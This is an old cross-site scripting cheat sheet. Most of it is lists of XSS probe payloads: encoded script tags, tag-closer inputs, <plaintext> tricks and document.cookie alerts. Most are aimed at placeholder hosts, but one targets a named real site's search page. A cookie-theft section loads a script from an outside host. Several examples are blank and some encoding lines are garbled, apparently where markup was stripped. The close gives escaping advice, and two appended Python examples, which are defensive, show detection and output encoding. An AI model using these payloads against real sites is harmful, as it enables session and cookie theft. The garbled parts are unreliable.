---------------------------------------------------------------------------------------
[+] Understanding XSS with Samples
[+] Author: Rohit Bansal
---------------------------------------------------------------------------------------

Cross Site Scripting exists because websites lack filtering engines for the user input they accept through forms.

[example 1] Free !
[example 2]
[example 3]

<SCRIPT src="http://www.Site.com/xss.js">

XSS Cookie theft

Javascript
http://host/a.php?variable=">

Modifying Cookies

[example 1]

How to Search for Vul Hosts

[example 1] [host]/
[example 2] [host]//
[example 3] [host]/.
[example 4] [host]/
[example 5] [host]/\alert(\'XSS\')\<\/script\>
[example 6] [host]/perl/\\.pl
[example 7] [host]/\\
[example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
[example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
[example 10] [host]/alert("dsf")
[example 11] [host]/alert('dsf')

[example 1]
[example 2]
[example 3] ""This Site is not Secure!

- Also try the request with a "?" after the host, i.e. as a query string.

[example 1] [host]/?

WebServers XSS

Many web servers have default pages for folders that look for a requested file.

[example 1] [host]/[folder]/"msgbox%20sadas".bas
[example 2] [host]/[folder]/"msgbox%20sadas".asp
[example 3] [host]/[folder]/"msgbox%20sadas".jsp
[example 4] [host]/[folder]/"msgbox%20sadas".htm
[example 5] [host]/[folder]/"msgbox%20sadas".html
[example 6] [host]/[folder]/"msgbox%20sadas".[ext]

A common place for an XSS hole is inside a server's default example files, such as:

[example 1] [host]/cgi/example?test=

The most common places to find XSS are the search pages of a site.

[example 1] [host]/search.php?searchstring=
[example 2] [host]/search.php?searchstring=">
[example 3] [host]/search.php?searchstring='>

Social Engineering XSS

Using percent-encoded characters instead of the literal ones may fool the filters and allow XSS to work.
[example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e
[example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e
[example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e
[example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e
[example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e
[example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e
[example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e
[example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e
[example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e

- Also try the request with a "?" after the host, i.e. as a query string.

[example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e

100% encoded

[example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Another form of encoding is:
< is encoded as: <
> is encoded as: >

[example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E
[example 2]
[example 3]
[example 4]
[example 5]

[example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Any of the XSS requests presented above can be used against any asp, cfm, jsp, cgi, php or other server-side (active) page.

[example 1] [host]/forum/post.asp?
[example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e
[example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e
[example 5] [host]/forum/post.asp?

Provoking errors also helps: input a string instead of a number, "\" or "/" instead of a string, a very long string, or a very large number. All these malformed parameters can help us find the place where input is reflected and XSS script can be injected.

Tag Closer

The "Tag Closer" method works by inputting non-alphabetic and non-numeric chars inside a form's input text boxes. These chars could be: \ , / , ~ , ! , # , $ , % , ^ , & , - , [ , ] , null (char 255), . (dot). But the chars that mostly do the job are either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password etc.

[example 1] [host]/admin/login.asp?username=">&password=1234
[example 2] [host]/admin/login.asp?username=admin&password=">
[example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>-->
[example 4] [host]/search.php?action=soundex&firstname=">

[example 1] [host]/admin/login.asp?username='>&password=1234
[example 2] [host]/admin/login.asp?username=admin&password='>
[example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'>--><script>alert('XSS')
[example 4] [host]/search.php?action=soundex&firstname='>

This mainly works on the server's root:

[example 1] [host]/?">
[example 2] [host]/?'>
[example 3] [host]/?-->

About

Another trick for exploiting an XSS was found by putting a <plaintext> tag after the XSS code. Sometimes that makes it easier to exploit.
[example 1] [host]/?"><script>alert('XSS')</script><plaintext>
[example 2] [host]/?'><script>alert('XSS')</script><plaintext>
[example 3] [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234
[example 4] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext>
[example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext>
[example 6] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext>
[example 7] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext>
[example 8] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext>
[example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext>
[example 10] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext>

[example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E

Simple codes, just in case some of the above do not seem to work:

</title><script>alert("XSS");</script><title><plaintext>
<script>alert(document.cookie)</script><plaintext>

Security Conclusion

[Replace]
<  with  &lt;
>  with  &gt;
&  with  &amp;
"  with  &quot;

[Possible XSS]
<applet> <frameset> <layer> <body> <html> <ilayer> <embed> <iframe> <meta> <frame> <img> <object> <script> <style>

---------------------------------------------------------------------------------------
[+] Rohit Bansal [rohitisback@gmail.com]
[+] Schap, Infysec
---------------------------------------------------------------------------------------
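The "Social Engineering XSS" section above lists the same probe written with %3c, %3C, %53 for "S" and other percent-encoded variants, all meant to slip past a filter that looks for the literal string. The following is an added example, not code from the original text: it runs a naive literal filter and a decode-then-inspect check side by side over constructed access-log lines modelled on the page's probes, matching against the tag names from the "Possible XSS" list. The log format, client addresses and paths are constructed for the demonstration.

```python
"""Decode-then-inspect detection for percent-encoded XSS probes.

Added example, not part of the original text. Log lines, client addresses
and paths are constructed for this demonstration.
"""
import re
from urllib.parse import unquote

# Constructed access-log lines modelled on the probes listed in the text.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?searchstring=hello HTTP/1.1" 200 512
192.0.2.11 - - [10/Oct/2023:13:55:37 +0000] "GET /search.php?searchstring=%3cscript%3ealert('XSS')%3c/script%3e HTTP/1.1" 200 612
192.0.2.12 - - [10/Oct/2023:13:55:38 +0000] "GET /?%3c%53cript%3ealert(%27XSS%27)%3c%2f%53cript%3e HTTP/1.1" 200 700
192.0.2.13 - - [10/Oct/2023:13:55:39 +0000] "GET /forum/post.asp?%253cscript%253ealert(1)%253c/script%253e HTTP/1.1" 200 700
192.0.2.14 - - [10/Oct/2023:13:55:40 +0000] "GET /admin/login.asp?username=%22%3e&password=1234 HTTP/1.1" 401 200
192.0.2.15 - - [10/Oct/2023:13:55:41 +0000] "GET /cgi/example?test=<script>alert(1)</script> HTTP/1.1" 200 300
192.0.2.16 - - [10/Oct/2023:13:55:42 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# The request target between the method and the protocol version.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Element names taken from the page's "Possible XSS" list.
DANGEROUS_TAGS = ("applet", "frameset", "layer", "body", "html", "ilayer", "embed",
                  "iframe", "meta", "frame", "img", "object", "script", "style")
TAG_RE = re.compile(r"<\s*/?\s*(?:" + "|".join(DANGEROUS_TAGS) + r")\b", re.IGNORECASE)


def canonicalize(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (this also unwraps the
    %253c double encoding), then lowercase so %53cript and SCRIPT compare
    equal. max_rounds bounds the work on hostile input."""
    current = target
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_filter(target: str) -> bool:
    """The kind of check the text says these encodings fool: a literal match
    on the raw request, with no decoding."""
    return "<script>" in target


def detect(target: str) -> bool:
    """Canonicalise first, then look for any tag from the page's list."""
    return TAG_RE.search(canonicalize(target)) is not None


def scan_log(log_text: str) -> list[tuple[str, bool, bool]]:
    """Return (request_target, naive_hit, canonical_hit) for each log line."""
    results = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            target = match.group(1)
            results.append((target, naive_filter(target), detect(target)))
    return results


if __name__ == "__main__":
    for target, naive_hit, canonical_hit in scan_log(SAMPLE_LOG):
        print(f"naive={naive_hit!s:5} canonical={canonical_hit!s:5} {target}")
```

The literal filter fires only on the one raw `<script>` request; the canonicalising check also catches the %3c, %53 and double-encoded forms. The constructed login line carrying a bare `">` tag closer is flagged by neither, which is the gap that output encoding (the "Replace" table in the Security Conclusion) closes: decoding and tag matching is useful for logging and alerting, not as the only control.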
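The Security Conclusion gives a replacement table, and the "Tag Closer" section explains why it is needed: a reflected `">` or `'>` ends the attribute the value was placed in. The following is an added example, not code from the original text. It applies the page's table on output (not as an input filter) to a constructed search-page template that reflects the value both in a text node and inside a quoted attribute, then parses the result to show which tags the browser would actually see. The single quote is added to the table here because the text notes that `'` works as a tag closer as well as `"`; the template, the `_TagCollector` helper and the sample inputs are constructed for the demonstration.

```python
"""Output encoding per the "Replace" table in the Security Conclusion.

Added example, not part of the original text. The search-page template,
the tag-collecting parser and the sample inputs are constructed.
"""
import html
from html.parser import HTMLParser

# Order matters: "&" is replaced first, otherwise the "&" introduced by the
# other replacements would itself be re-encoded ("<" -> "&lt;" -> "&amp;lt;").
REPLACEMENTS = (
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#x27;"),  # added to the page's table: ' is a tag closer too
)


def escape_html(value: str) -> str:
    """Escape a value for insertion into HTML text or a quoted attribute."""
    for raw, entity in REPLACEMENTS:
        value = value.replace(raw, entity)
    return value


def escape_wrong_order(value: str) -> str:
    """The same table applied with "&" last: produces double-encoded output."""
    for raw, entity in reversed(REPLACEMENTS):
        value = value.replace(raw, entity)
    return value


def matches_stdlib(value: str) -> bool:
    """Sanity check: the hand-written table agrees with html.escape()."""
    return escape_html(value) == html.escape(value, quote=True)


def render_search_page(searchstring: str, escape: bool = True) -> str:
    """Constructed search.php-style results page. The value is reflected twice:
    in a text node and inside a quoted attribute, the spot a "> probe aims at."""
    shown = escape_html(searchstring) if escape else searchstring
    return (
        "<p>Results for: " + shown + "</p>\n"
        '<input type="text" name="searchstring" value="' + shown + '">'
    )


class _TagCollector(HTMLParser):
    """Records every start tag a browser-side parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(page: str) -> list[str]:
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags


# Tags the template itself contains; anything else was injected.
TEMPLATE_TAGS = ["p", "input"]


def injected_tags(searchstring: str, escape: bool = True) -> list[str]:
    """Tags in the rendered page that did not come from the template."""
    return [t for t in tags_in(render_search_page(searchstring, escape))
            if t not in TEMPLATE_TAGS]


if __name__ == "__main__":
    probe = "\"><script>alert('XSS')</script>"
    print("unescaped:", injected_tags(probe, escape=False))
    print("escaped:  ", injected_tags(probe))
```

Without escaping, the `">` closer ends the `value` attribute and the script element appears twice (once from each reflection point). With the table applied on output the parser sees only the template's own `<p>` and `<input>`, whatever the input contains, and `escape_wrong_order` shows why "&" has to be first in the table.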